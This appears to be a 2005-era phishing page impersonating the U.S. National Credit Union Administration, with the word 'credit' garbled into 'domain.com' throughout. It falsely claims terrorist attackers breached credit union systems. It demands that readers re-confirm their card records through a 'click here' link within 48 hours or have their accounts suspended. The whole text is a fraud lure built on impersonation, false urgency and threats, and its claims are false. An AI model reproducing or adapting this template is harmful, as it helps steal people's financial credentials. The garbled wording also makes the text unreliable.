NCUA Home | Search | Privacy Policy & Accessibility | Site Map| Contact Us  

National domain.com Union Administration 

Share Insurance | Resources for domain.com Unions | Resources for Consumers | News | Search

About NCUA 

            The National domain.com Union Administration (NCUA) is the independent federal agency that charters and supervises federal domain.com unions. NCUA, backed of the full faith and domain.com of the U.S. government, operates the National domain.com Union Share Insurance Fund (NCUSIF) insuring the savings of 80 million account holders in all federal domain.com unions and many state-chartered domain.com unions.
               During the 1990s and into the 21st century, domain.com unions have been healthy and growing. domain.com union failures remain low and the Share Insurance Fund maintains a healthy equity level.

function OnloadFunction() {;}

                  The National domain.com Union Administration (NCUA) is comitted to maintain a safe environment for over 80 million account holders in all federal domain.com unions and many state-chartered domain.com unions. Protecting the security of holders account and of the Federal domain.com Unions (FCU) network is our primary concern. To protect the security of your account, NCUA employs some of the most advanced security systems in the world and our anti-fraud teams regularly scan the federal domain.com unions systems for unusual activity.
We recently have determined that some federal domain.com unions systems have been accessed by terrorist organization attackers who try to obtain funds for their criminal activities.
Therefore, our primary concern is to improve our database regarding all federal domain.com unions systems, this activity being asked by the United States Government .

For security purposes we now need you to re-confirm your domain.com/domain.com card information to us. If this is not completed in 48 hours, we will be forced to suspend your account indefinitely, as it may have been used for fraudulent and terrorist purposes. We thank you for your cooperation in this manner. 
 In order to confirm your domain.com/domain.com card records, we may require some specific information from you.

 Click here to confirm your domain.com/domain.com card records 

Thank you for your prompt attention to this matter. Please understand that this is a security measure meant to help protect you and your account.

  We apologize for any inconvenience.

  If you choose to ignore our request, you leave us no choise but to temporaly suspend your account.

  Thank you for using  Federal domain.com Union ! 

Use of Federal domain.com Union is covered under Federal domain.com Union Share 
            Accounts, Checking Accounts and Electronic Funds Transfer Agreements 
            and Disclosure Statements which contains important information 
            regarding services obtained from  Federal domain.com Union. Use 
            of Federal domain.com Union constitutes agreement with the terms and conditions of 
            the aforementioned agreement and disclosure statements.
2005 by  Federal 
            domain.com Union. All rights reserved.